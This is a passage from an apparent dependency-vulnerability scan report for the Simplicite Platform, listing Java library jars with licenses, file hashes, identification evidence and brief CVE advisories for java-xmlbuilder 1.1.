http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/jaxrs/jackson-jaxrs-xml-provider/2.10.5/jackson-jaxrs-xml-provider-2.10.5.jar
MD5: 395bf69b81245c6dc274c7b8d2358876
SHA1: 8e374b72f30e3861040f1ab7f859bc8bcc804eac
SHA256: 478951b5abc1d53c850f247fcacbb9a1c1c6315a6e9e1a3853571d4d96a71f10
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-jaxrs-xml-provider High Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor jar package name jaxrs Highest Vendor jar package name xml Highest Vendor Manifest bundle-docurl http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-xml-provider Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.jaxrs.jackson-jaxrs-xml-provider Medium Vendor Manifest implementation-build-date 2020-07-21 03:57:12+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.jaxrs Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-jaxrs-xml-provider Highest Vendor pom artifactid jackson-jaxrs-xml-provider Low Vendor pom groupid com.fasterxml.jackson.jaxrs Highest Vendor pom name Jackson-JAXRS-XML High Vendor pom parent-artifactid jackson-jaxrs-providers Low Product file name jackson-jaxrs-xml-provider High Product jar package name fasterxml Highest Product jar package name jackson Highest Product jar package name jaxrs Highest Product jar package name xml Highest Product Manifest bundle-docurl http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-xml-provider Low Product Manifest Bundle-Name Jackson-JAXRS-XML Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.jaxrs.jackson-jaxrs-xml-provider Medium Product Manifest implementation-build-date 2020-07-21 03:57:12+0000 Low Product Manifest Implementation-Title Jackson-JAXRS-XML High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Jackson-JAXRS-XML Medium Product pom artifactid jackson-jaxrs-xml-provider Highest Product pom groupid com.fasterxml.jackson.jaxrs Highest Product pom name Jackson-JAXRS-XML High Product pom parent-artifactid jackson-jaxrs-providers Medium Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
jackson-module-jaxb-annotations-2.10.5.jarDescription:
Support for using JAXB annotations as an alternative to "native" Jackson annotations, for configuring
data-binding.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/module/jackson-module-jaxb-annotations/2.10.5/jackson-module-jaxb-annotations-2.10.5.jar
MD5: 85f8c37a9c6504d0891b909c0d210be6
SHA1: f438b5eb66d15cbffca1497408b4cb379af9b068
SHA256: 994a0a510a35d55a869567807075736597da97e9d36ad1ebaff5e37def5a55d3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jackson-module-jaxb-annotations High Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor jar package name jaxb Highest Vendor jar package name module Highest Vendor Manifest bundle-docurl https://github.com/FasterXML/jackson-modules-base Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.module.jackson-module-jaxb-annotations Medium Vendor Manifest implementation-build-date 2020-07-21 03:03:15+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.module Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-module-jaxb-annotations Highest Vendor pom artifactid jackson-module-jaxb-annotations Low Vendor pom groupid com.fasterxml.jackson.module Highest Vendor pom name Jackson module: JAXB Annotations High Vendor pom parent-artifactid jackson-modules-base Low Vendor pom url FasterXML/jackson-modules-base Highest Product file name jackson-module-jaxb-annotations High Product jar package name fasterxml Highest Product jar package name jackson Highest Product jar package name jaxb Highest Product jar package name module Highest Product Manifest bundle-docurl https://github.com/FasterXML/jackson-modules-base Low Product Manifest Bundle-Name Jackson module: JAXB Annotations Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.module.jackson-module-jaxb-annotations Medium Product Manifest implementation-build-date 2020-07-21 03:03:15+0000 Low Product Manifest Implementation-Title Jackson module: JAXB Annotations High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title Jackson module: JAXB Annotations Medium Product pom artifactid jackson-module-jaxb-annotations Highest Product pom groupid com.fasterxml.jackson.module Highest Product pom name Jackson module: JAXB Annotations High Product pom parent-artifactid jackson-modules-base Medium Product pom url FasterXML/jackson-modules-base High Version file version 2.10.5 High Version Manifest Bundle-Version 2.10.5 High Version Manifest Implementation-Version 2.10.5 High Version pom version 2.10.5 Highest
jai-imageio-core-1.4.0.jarDescription:
Java Advanced Imaging Image I/O Tools API core, but without the classes
involved with javax.media.jai dependencies, JPEG2000 or
codecLibJIIO, meaning that this library can be distributed under the
modified BSD license and should be GPL compatible.
License:
BSD 3-clause License w/nuclear disclaimer: LICENSE.txt File Path: /var/simplicite/.m2/repository/com/github/jai-imageio/jai-imageio-core/1.4.0/jai-imageio-core-1.4.0.jar
MD5: 6978d733bfb55c0a82639f724fe5f3bb
SHA1: fb6d79b929556362a241b2f65a04e538062f0077
SHA256: 8ad3c68e9efffb10ac87ff8bc589adf64b04a729c5194c079efd0643607fd72a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jai-imageio-core High Vendor jar package name github Highest Vendor Manifest bundle-docurl https://github.com/jai-imageio/ Low Vendor Manifest bundle-symbolicname jai-imageio-core Medium Vendor Manifest extension-name com.github.jai-imageio-jai-imageio-core Medium Vendor Manifest Implementation-Vendor https://github.com/jai-imageio/ jai-imageio GitHub group High Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor Manifest specification-vendor Sun Microsystems, Inc. Low Vendor Manifest url https://github.com/jai-imageio/jai-imageio-core Low Vendor pom artifactid jai-imageio-core Highest Vendor pom artifactid jai-imageio-core Low Vendor pom developer email stian@s11.no Low Vendor pom developer name Stian Soiland-Reyes Medium Vendor pom developer org s11 Medium Vendor pom developer org URL http://s11.no/ Medium Vendor pom groupid com.github.jai-imageio Highest Vendor pom name Java Advanced Imaging Image I/O Tools API core (standalone) High Vendor pom organization name jai-imageio GitHub group High Vendor pom organization url jai-imageio/ Medium Vendor pom url jai-imageio/jai-imageio-core Highest Product file name jai-imageio-core High Product jar package name github Highest Product Manifest bundle-docurl https://github.com/jai-imageio/ Low Product Manifest Bundle-Name Java Advanced Imaging Image I/O Tools API core (standalone) Medium Product Manifest bundle-symbolicname jai-imageio-core Medium Product Manifest extension-name com.github.jai-imageio-jai-imageio-core Medium Product Manifest Implementation-Title Java Advanced Imaging Image I/O Tools API core (standalone) High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product Manifest specification-title Java Advanced Imaging Medium Product Manifest url https://github.com/jai-imageio/jai-imageio-core Low Product pom artifactid jai-imageio-core Highest Product pom developer email stian@s11.no Low Product pom developer name Stian Soiland-Reyes Low Product pom developer org s11 Low Product pom developer org URL http://s11.no/ Low Product pom groupid com.github.jai-imageio Highest Product pom name Java Advanced Imaging Image I/O Tools API core (standalone) High Product pom organization name jai-imageio GitHub group Low Product pom url jai-imageio/ High Product pom url jai-imageio/jai-imageio-core High Version file version 1.4.0 High Version Manifest Bundle-Version 1.4.0 High Version Manifest Implementation-Version 1.4.0 High Version pom version 1.4.0 Highest
jakarta.activation-1.2.1.jarDescription:
JavaBeans Activation Framework License:
http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/com/sun/activation/jakarta.activation/1.2.1/jakarta.activation-1.2.1.jar
MD5: dc519b1f09bbaf9274ea5da358a00110
SHA1: 8013606426a73d8ba6b568370877251e91a38b89
SHA256: d84d4ba8b55cdb7fdcbb885e6939386367433f56f5ab8cfdc302a7c3587fa92b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jakarta.activation High Vendor jar package name activation Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest automatic-module-name jakarta.activation Medium Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname com.sun.activation.jakarta.activation Medium Vendor Manifest extension-name jakarta.activation Medium Vendor Manifest Implementation-Vendor Eclipse Foundation High Vendor Manifest Implementation-Vendor-Id com.sun Medium Vendor Manifest specification-vendor Eclipse Foundation Low Vendor pom artifactid jakarta.activation Highest Vendor pom artifactid jakarta.activation Low Vendor pom groupid com.sun.activation Highest Vendor pom name JavaBeans Activation Framework High Vendor pom parent-artifactid all Low Product file name jakarta.activation High Product jar package name activation Highest Product jar package name javax Highest Product jar package name sun Highest Product Manifest automatic-module-name jakarta.activation Medium Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name JavaBeans Activation Framework Medium Product Manifest bundle-symbolicname com.sun.activation.jakarta.activation Medium Product Manifest extension-name jakarta.activation Medium Product Manifest Implementation-Title javax.activation High Product Manifest specification-title JavaBeans(TM) Activation Framework Specification Medium Product pom artifactid jakarta.activation Highest Product pom groupid com.sun.activation Highest Product pom name JavaBeans Activation Framework High Product pom parent-artifactid all Medium Version file version 1.2.1 High Version Manifest Bundle-Version 1.2.1 High Version Manifest Implementation-Version 1.2.1 High Version pom version 1.2.1 Highest
jakarta.activation-api-1.2.1.jarDescription:
JavaBeans Activation Framework API jar License:
http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/jakarta/activation/jakarta.activation-api/1.2.1/jakarta.activation-api-1.2.1.jar
MD5: 9b647398add993324d3d9e5effa6005a
SHA1: 562a587face36ec7eff2db7f2fc95425c6602bc1
SHA256: 8b0a0f52fa8b05c5431921a063ed866efaa41dadf2e3a7ee3e1961f2b0d9645b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jakarta.activation-api High Vendor jar package name activation Highest Vendor Manifest automatic-module-name jakarta.activation Medium Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname jakarta.activation-api Medium Vendor Manifest extension-name jakarta.activation Medium Vendor Manifest Implementation-Vendor Eclipse Foundation High Vendor Manifest Implementation-Vendor-Id com.sun Medium Vendor Manifest specification-vendor Eclipse Foundation Low Vendor pom artifactid jakarta.activation-api Highest Vendor pom artifactid jakarta.activation-api Low Vendor pom groupid jakarta.activation Highest Vendor pom name JavaBeans Activation Framework API jar High Vendor pom parent-artifactid all Low Vendor pom parent-groupid com.sun.activation Medium Product file name jakarta.activation-api High Product jar package name activation Highest Product Manifest automatic-module-name jakarta.activation Medium Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name JavaBeans Activation Framework API jar Medium Product Manifest bundle-symbolicname jakarta.activation-api Medium Product Manifest extension-name jakarta.activation Medium Product Manifest Implementation-Title jakarta.activation.jakarta.activation-api High Product Manifest specification-title jakarta.activation.jakarta.activation-api Medium Product pom artifactid jakarta.activation-api Highest Product pom groupid jakarta.activation Highest Product pom name JavaBeans Activation Framework API jar High Product pom parent-artifactid all Medium Product pom parent-groupid com.sun.activation Medium Version file version 1.2.1 High Version Manifest Bundle-Version 1.2.1 High Version Manifest Implementation-Version 1.2.1 High Version pom version 1.2.1 Highest
jakarta.xml.bind-api-2.3.2.jarDescription:
JAXB (JSR 222) API License:
http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/jakarta/xml/bind/jakarta.xml.bind-api/2.3.2/jakarta.xml.bind-api-2.3.2.jar
MD5: dabb40ba58199304c640b7bd8bb2fbac
SHA1: 8d49996a4338670764d7ca4b85a1c4ccf7fe665d
SHA256: 69156304079bdeed9fc0ae3b39389f19b3cc4ba4443bc80508995394ead742ea
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name jakarta.xml.bind-api High Vendor jar package name bind Highest Vendor jar package name xml Highest Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname jakarta.xml.bind-api Medium Vendor Manifest extension-name jakarta.xml.bind Medium Vendor Manifest implementation-build-id UNKNOWN-18b5002, 2018-12-27T15:29:49+0000 Low Vendor Manifest multi-release true Low Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid jakarta.xml.bind-api Highest Vendor pom artifactid jakarta.xml.bind-api Low Vendor pom groupid jakarta.xml.bind Highest Vendor pom parent-artifactid jakarta.xml.bind-api-parent Low Product file name jakarta.xml.bind-api High Product jar package name bind Highest Product jar package name jaxb Highest Product jar package name xml Highest Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name jakarta.xml.bind-api Medium Product Manifest bundle-symbolicname jakarta.xml.bind-api Medium Product Manifest extension-name jakarta.xml.bind Medium Product Manifest implementation-build-id UNKNOWN-18b5002, 2018-12-27T15:29:49+0000 Low Product Manifest multi-release true Low Product pom artifactid jakarta.xml.bind-api Highest Product pom groupid jakarta.xml.bind Highest Product pom parent-artifactid jakarta.xml.bind-api-parent Medium Version file version 2.3.2 High Version Manifest Bundle-Version 2.3.2 High Version Manifest Implementation-Version 2.3.2 High Version pom version 2.3.2 Highest
java-jwt-3.10.2.jarDescription:
Java implementation of JSON Web Token (JWT) License:
The MIT License (MIT): https://raw.githubusercontent.com/auth0/java-jwt/master/LICENSE File Path: /var/simplicite/.m2/repository/com/auth0/java-jwt/3.10.2/java-jwt-3.10.2.jar
MD5: 88ecbde4572957aa2333f1f2e8317584
SHA1: a73fc34425dffbf32207f74f1b78531ebeaf7685
SHA256: df47b77d8feda8cd9199b2a03ae2d2ebe60d40576c58ee6c6ef05c3407d20011
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name java-jwt High Vendor jar package name auth0 Highest Vendor jar package name jwt Highest Vendor pom artifactid java-jwt Highest Vendor pom artifactid java-jwt Low Vendor pom developer email hernan@auth0.com Low Vendor pom developer email luciano.balmaceda@auth0.com Low Vendor pom developer email oss@auth0.com Low Vendor pom developer id auth0 Medium Vendor pom developer id hzalaz Medium Vendor pom developer id lbalmaceda Medium Vendor pom developer name Auth0 Medium Vendor pom developer name Hernan Zalazar Medium Vendor pom developer name Luciano Balmaceda Medium Vendor pom groupid com.auth0 Highest Vendor pom name java jwt High Vendor pom url auth0/java-jwt Highest Product file name java-jwt High Product jar package name auth0 Highest Product jar package name jwt Highest Product Manifest Implementation-Title java-jwt High Product pom artifactid java-jwt Highest Product pom developer email hernan@auth0.com Low Product pom developer email luciano.balmaceda@auth0.com Low Product pom developer email oss@auth0.com Low Product pom developer id auth0 Low Product pom developer id hzalaz Low Product pom developer id lbalmaceda Low Product pom developer name Auth0 Low Product pom developer name Hernan Zalazar Low Product pom developer name Luciano Balmaceda Low Product pom groupid com.auth0 Highest Product pom name java jwt High Product pom url auth0/java-jwt High Version file version 3.10.2 High Version Manifest Implementation-Version 3.10.2 High Version pom version 3.10.2 Highest
java-libpst-0.8.1.jarDescription:
A library to read PST files with java, without need for external libraries. License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/pff/java-libpst/0.8.1/java-libpst-0.8.1.jar
MD5: 6be27662e0b06154e5f05938937d16b7
SHA1: ad31986653dac9cb5132ea5b2999c20b4b286255
SHA256: a3f7b3c934f477b0fc3c0eadebc3d24872bbebc3ac5a22ab575e5f476ea34757
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name java-libpst High Vendor jar package name pff Highest Vendor jar package name pff Low Vendor pom artifactid java-libpst Highest Vendor pom artifactid java-libpst Low Vendor pom developer email @rjohnsondev Low Vendor pom developer name Richard Johnson Medium Vendor pom developer org Skimlinks Medium Vendor pom groupid com.pff Highest Vendor pom name java-libpst High Vendor pom url https://code.google.com/p/java-libpst/ Highest Product file name java-libpst High Product jar package name pff Highest Product pom artifactid java-libpst Highest Product pom developer email @rjohnsondev Low Product pom developer name Richard Johnson Low Product pom developer org Skimlinks Low Product pom groupid com.pff Highest Product pom name java-libpst High Product pom url https://code.google.com/p/java-libpst/ Medium Version file version 0.8.1 High Version pom version 0.8.1 Highest
java-saml-2.5.0.jarFile Path: /var/simplicite/.m2/repository/com/onelogin/java-saml/2.5.0/java-saml-2.5.0.jarMD5: 4471c76d5079596c9737a069bf8c16ddSHA1: 98ef55b85676076f1fc94cc68d359e826170a16bSHA256: 8959df4e44cb4ef3fdc740536609b6462928b1ce8912ac15d667c772da4a36b6Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name java-saml High Vendor jar package name onelogin Highest Vendor jar package name onelogin Low Vendor jar package name saml2 Low Vendor pom artifactid java-saml Highest Vendor pom artifactid java-saml Low Vendor pom groupid com.onelogin Highest Vendor pom name OneLogin java-saml Toolkit High Vendor pom parent-artifactid java-saml-toolkit Low Product file name java-saml High Product jar package name onelogin Highest Product jar package name saml2 Low Product pom artifactid java-saml Highest Product pom groupid com.onelogin Highest Product pom name OneLogin java-saml Toolkit High Product pom parent-artifactid java-saml-toolkit Medium Version file version 2.5.0 High Version pom version 2.5.0 Highest
java-saml-core-2.5.0.jarFile Path: /var/simplicite/.m2/repository/com/onelogin/java-saml-core/2.5.0/java-saml-core-2.5.0.jarMD5: 630920f20b6ad95203ae6ca0ceefa518SHA1: ec4c26db2b833511836f2cf37f445c275d0dff45SHA256: 40ef219f434852a400501f5766848fbb62f16ec671d7a79fc0dfeb969c04fd6cReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name java-saml-core High Vendor jar package name onelogin Highest Vendor jar package name onelogin Low Vendor jar package name saml2 Low Vendor pom artifactid java-saml-core Highest Vendor pom artifactid java-saml-core Low Vendor pom groupid com.onelogin Highest Vendor pom name OneLogin java-saml Toolkit Core High Vendor pom parent-artifactid java-saml-toolkit Low Product file name java-saml-core High Product jar package name onelogin Highest Product jar package name saml2 Low Product pom artifactid java-saml-core Highest Product pom groupid com.onelogin Highest Product pom name OneLogin java-saml Toolkit Core High Product pom parent-artifactid java-saml-toolkit Medium Version file version 2.5.0 High Version pom version 2.5.0 Highest
java-xmlbuilder-1.1.jarDescription:
XML Builder is a utility that creates simple XML documents using relatively sparse Java code License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /var/simplicite/.m2/repository/com/jamesmurty/utils/java-xmlbuilder/1.1/java-xmlbuilder-1.1.jar
MD5: cd9afe97b82d327ceda4dac0de24d61c
SHA1: 05527416a8f63a8dad440434a1d42937d0ef6391
SHA256: 5257fdeb719b95039fc6cf35012527939856b2f2c9d763d593cc0cb64e88ab24
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name java-xmlbuilder High Vendor jar package name jamesmurty Highest Vendor jar package name jamesmurty Low Vendor jar package name utils Highest Vendor jar package name utils Low Vendor jar package name xmlbuilder Highest Vendor pom artifactid java-xmlbuilder Highest Vendor pom artifactid java-xmlbuilder Low Vendor pom developer id jmurty Medium Vendor pom developer name James Murty Medium Vendor pom groupid com.jamesmurty.utils Highest Vendor pom name java-xmlbuilder High Vendor pom url jmurty/java-xmlbuilder Highest Product file name java-xmlbuilder High Product jar package name jamesmurty Highest Product jar package name utils Highest Product jar package name utils Low Product jar package name xmlbuilder Highest Product pom artifactid java-xmlbuilder Highest Product pom developer id jmurty Low Product pom developer name James Murty Low Product pom groupid com.jamesmurty.utils Highest Product pom name java-xmlbuilder High Product pom url jmurty/java-xmlbuilder High Version file version 1.1 High Version pom version 1.1 Highest
CVE-2014-125087 suppress
A vulnerability was found in java-xmlbuilder up to 1.1. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. Upgrading to version 1.2 is able to address this issue. The name of the patch is e6fddca201790abab4f2c274341c0bb8835c3e73. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221480. CWE-611 Improper Restriction of XML External Entity Reference ('XXE')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H References:
Vulnerable Software & Versions:
CVE-2021-4277 suppress
A vulnerability, which was classified as problematic, has been found in fredsmith utils. This issue affects some unknown processing of the file screenshot_sync of the component Filename Handler. The manipulation leads to predictable from observable state. The name of the patch is dbab1b66955eeb3d76b34612b358307f5c4e3944. It is recommended to apply a patch to fix this issue. The identifier VDB-216749 was assigned to this vulnerability. CWE-330 Use of Insufficiently Random Values
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N References:
Vulnerable Software & Versions:
javase-3.0.1.jarDescription:
Java SE-specific extensions to core ZXing library File Path: /var/simplicite/.m2/repository/com/google/zxing/javase/3.0.1/javase-3.0.1.jarMD5: 04258960339322ce4fb90718899ff4c9SHA1: 06fa0ae253f5bb2943fb64100c936d6a142832c2SHA256: 83c1e61db240c81b9b9628ea8dd63944cacf2b4f3578b4f3f4d3104506e4d0a4Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javase High Vendor jar package name client Low Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name zxing Highest Vendor jar package name zxing Low Vendor pom artifactid javase Highest Vendor pom artifactid javase Low Vendor pom groupid com.google.zxing Highest Vendor pom name ZXing Java SE extensions High Vendor pom parent-artifactid zxing-parent Low Product file name javase High Product jar package name client Low Product jar package name google Highest Product jar package name j2se Low Product jar package name zxing Highest Product jar package name zxing Low Product pom artifactid javase Highest Product pom groupid com.google.zxing Highest Product pom name ZXing Java SE extensions High Product pom parent-artifactid zxing-parent Medium Version file version 3.0.1 High Version pom version 3.0.1 Highest
javax.activation-api-1.2.0.jarDescription:
JavaBeans Activation Framework API jar License:
https://github.com/javaee/activation/blob/master/LICENSE.txt File Path: /var/simplicite/.m2/repository/javax/activation/javax.activation-api/1.2.0/javax.activation-api-1.2.0.jar
MD5: 5e50e56bcf4a3ef3bc758f69f7643c3b
SHA1: 85262acf3ca9816f9537ca47d5adeabaead7cb16
SHA256: 43fdef0b5b6ceb31b0424b208b930c74ab58fac2ceeb7b3f6fd3aeb8b5ca4393
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name javax.activation-api High Vendor jar package name activation Highest Vendor jar package name javax Highest Vendor Manifest automatic-module-name java.activation Medium Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname javax.activation-api Medium Vendor Manifest extension-name javax.activation Medium Vendor Manifest Implementation-Vendor Oracle High Vendor Manifest Implementation-Vendor-Id com.sun Medium Vendor Manifest originally-created-by 1.8.0_141 (Oracle Corporation) Low Vendor Manifest specification-vendor Oracle Low Vendor Manifest (hint) Implementation-Vendor sun High Vendor Manifest (hint) specification-vendor sun Low Vendor pom artifactid javax.activation-api Highest Vendor pom artifactid javax.activation-api Low Vendor pom groupid javax.activation Highest Vendor pom name JavaBeans Activation Framework API jar High Vendor pom parent-artifactid all Low Vendor pom parent-groupid com.sun.activation Medium Product file name javax.activation-api High Product jar package name activation Highest Product jar package name javax Highest Product Manifest automatic-module-name java.activation Medium Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name JavaBeans Activation Framework API jar Medium Product Manifest bundle-symbolicname javax.activation-api Medium Product Manifest extension-name javax.activation Medium Product Manifest Implementation-Title javax.activation.javax.activation-api High Product Manifest originally-created-by 1.8.0_141 (Oracle Corporation) Low Product Manifest specification-title javax.activation.javax.activation-api Medium Product pom artifactid javax.activation-api Highest Product pom groupid javax.activation Highest Product pom name JavaBeans Activation Framework API jar High Product pom parent-artifactid all Medium Product pom parent-groupid com.sun.activation Medium Version file version 1.2.0 High Version Manifest Bundle-Version 1.2.0 High Version Manifest Implementation-Version 1.2.0 High Version pom version 1.2.0 Highest
javax.annotation-api-1.3.2.jarDescription:
Common Annotations for the JavaTM Platform API License:
CDDL + GPLv2 with classpath exception: https://github.com/javaee/javax.annotation/blob/master/LICENSE File Path: /var/simplicite/.m2/repository/javax/annotation/javax.annotation-api/1.3.2/javax.annotation-api-1.3.2.jar
MD5: 2ab1973eefffaa2aeec47d50b9e40b9d
SHA1: 934c04d3cfef185a8008e7bf34331b79730a9d43
SHA256: e04ba5195bcd555dc95650f7cc614d151e4bcd52d29a10b8aa2197f3ab89ab9b
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.annotation-api High Vendor jar package name annotation Highest Vendor jar package name javax Highest Vendor Manifest automatic-module-name java.annotation Medium Vendor Manifest bundle-docurl https://javaee.github.io/glassfish Low Vendor Manifest bundle-symbolicname javax.annotation-api Medium Vendor Manifest extension-name javax.annotation Medium Vendor Manifest Implementation-Vendor GlassFish Community High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.annotation-api Highest Vendor pom artifactid javax.annotation-api Low Vendor pom developer id ldemichiel Medium Vendor pom developer name Linda De Michiel Medium Vendor pom developer org Oracle Corp. Medium Vendor pom groupid javax.annotation Highest Vendor pom name ${extension.name} API High Vendor pom organization name GlassFish Community High Vendor pom organization url https://javaee.github.io/glassfish Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://jcp.org/en/jsr/detail?id=250 Highest Product file name javax.annotation-api High Product jar package name annotation Highest Product jar package name javax Highest Product Manifest automatic-module-name java.annotation Medium Product Manifest bundle-docurl https://javaee.github.io/glassfish Low Product Manifest Bundle-Name javax.annotation API Medium Product Manifest bundle-symbolicname javax.annotation-api Medium Product Manifest extension-name javax.annotation Medium Product pom artifactid javax.annotation-api Highest Product pom developer id ldemichiel Low Product pom developer name Linda De Michiel Low Product pom developer org Oracle Corp. Low Product pom groupid javax.annotation Highest Product pom name ${extension.name} API High Product pom organization name GlassFish Community Low Product pom organization url https://javaee.github.io/glassfish Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://jcp.org/en/jsr/detail?id=250 Medium Version file version 1.3.2 High Version Manifest Bundle-Version 1.3.2 High Version Manifest Implementation-Version 1.3.2 High Version pom parent-version 1.3.2 Low Version pom version 1.3.2 Highest
javax.ejb-api-3.2.2.jarDescription:
Project GlassFish Enterprise JavaBean API License:
CDDL + GPLv2 with classpath exception: https://oss.oracle.com/licenses/CDDL+GPL-1.1 File Path: /var/simplicite/.m2/repository/javax/ejb/javax.ejb-api/3.2.2/javax.ejb-api-3.2.2.jar
MD5: f7a1ffa8ec359720a01dd09f79f042c3
SHA1: 8921a3e3cb30fe5966531ad53902eef19303123b
SHA256: 13ff874c58c32b649077dab6ab23bc93938610adc99e90d63933f6f074805b72
Referenced In Project/Scope: Simplicite Platform:provided
Evidence Type Source Name Value Confidence Vendor file name javax.ejb-api High Vendor jar package name ejb Highest Vendor jar package name javax Highest Vendor Manifest bundle-docurl http://www.oracle.com Low Vendor Manifest bundle-symbolicname javax.ejb-api Medium Vendor Manifest extension-name javax.ejb Medium Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.ejb-api Highest Vendor pom artifactid javax.ejb-api Low Vendor pom developer id mvatkina Medium Vendor pom developer name Marina Vatkina Medium Vendor pom developer org Oracle, Inc. Medium Vendor pom groupid javax.ejb Highest Vendor pom name ${extension.name} API High Vendor pom organization name Oracle Corporation High Vendor pom organization url http://www.oracle.com Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url javaee/javax.ejb Highest Product file name javax.ejb-api High Product jar package name ejb Highest Product jar package name javax Highest Product Manifest bundle-docurl http://www.oracle.com Low Product Manifest Bundle-Name javax.ejb API Medium Product Manifest bundle-symbolicname javax.ejb-api Medium Product Manifest extension-name javax.ejb Medium Product pom artifactid javax.ejb-api Highest Product pom developer id mvatkina Low Product pom developer name Marina Vatkina Low Product pom developer org Oracle, Inc. Low Product pom groupid javax.ejb Highest Product pom name ${extension.name} API High Product pom organization name Oracle Corporation Low Product pom organization url http://www.oracle.com Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url javaee/javax.ejb High Version file version 3.2.2 High Version Manifest Bundle-Version 3.2.2 High Version Manifest Implementation-Version 3.2.2 High Version pom parent-version 3.2.2 Low Version pom version 3.2.2 Highest
javax.inject-1.jarDescription:
The javax.inject API License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/javax/inject/javax.inject/1/javax.inject-1.jar
MD5: 289075e48b909e9e74e6c915b3631d2e
SHA1: 6975da39a7040257bd51d21a231b76c915872d38
SHA256: 91c77044a50c481636c32d916fd89c9118a72195390452c81065080f957de7ff
Referenced In Project/Scope: Simplicite Platform:compile
